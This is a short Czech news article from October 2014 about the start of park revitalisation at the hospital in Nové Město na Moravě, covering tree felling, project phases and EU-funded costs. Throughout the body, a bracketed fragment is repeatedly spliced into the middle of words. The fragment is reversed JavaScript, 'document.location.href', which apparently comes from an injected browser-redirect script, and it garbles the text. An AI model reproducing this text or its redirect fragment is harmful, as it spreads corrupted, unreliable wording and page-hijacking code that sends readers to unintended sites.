Rainbow page separator

V novoměstské nemocnici začali revitalizovat park

Pondělí, 13. října 2014

Nemocnice Nové Město na Moravě, park

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Dlouho připravovaná revitalizace zeleně byla v minulých dnech zahájena v parku kolem novoměstské nemocnice.
„Projekt na dalších patnáct až dvacet let ošetří a zkvalitní zeleň v nemocnici, navíc dá celému areálu jednotný architek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonický ráz,“ vysvětlil Vladimír Zelený, technický náměstek nemocnice.
První etapa úprav zeleně bude probíhat do prosince. Začíná se vykácením asi s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky přerostlých, poškozených či nevhodných stromů. Zároveň budou provedeny zdravotní a výchovné řezy, omlazovací práce na dřevinách a výsadba nových stromů a keřů, které nahradí ty vykácené.
„Druhá etapa bude pokračovat v první polovině roku 2015. Mimo jiné bude její součástí například založení nového trávníku na téměř 3,5 hektarech plochy v celé nemocnici. Kompletně by měly být úpravy zeleně dokončeny v červenci,“ upřesnil mluvčí novoměstské nemocnice Roman Kra[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tochvíl.
Pacienty i návštěvníky areálu mohou v souvislosti s úpravou zeleně postihnout drobné problémy. „Práce na revitalizaci samozřejmě mírně omezí provoz jak v parku, tak v celém areálu. Omlouváme se návštěvníkům a pacientům za případné komplikace a hluk. Věříme ale, že výsledek revitalizace bude stát za [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to,“ dodal Vladimír Zelený.
Obnova zeleně vyjde celkem na 2,5 milionu korun, pětasedmdesát procent z [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho bude uhrazeno prostřednictvím evropských peněz a Státního fondu životního prostředí.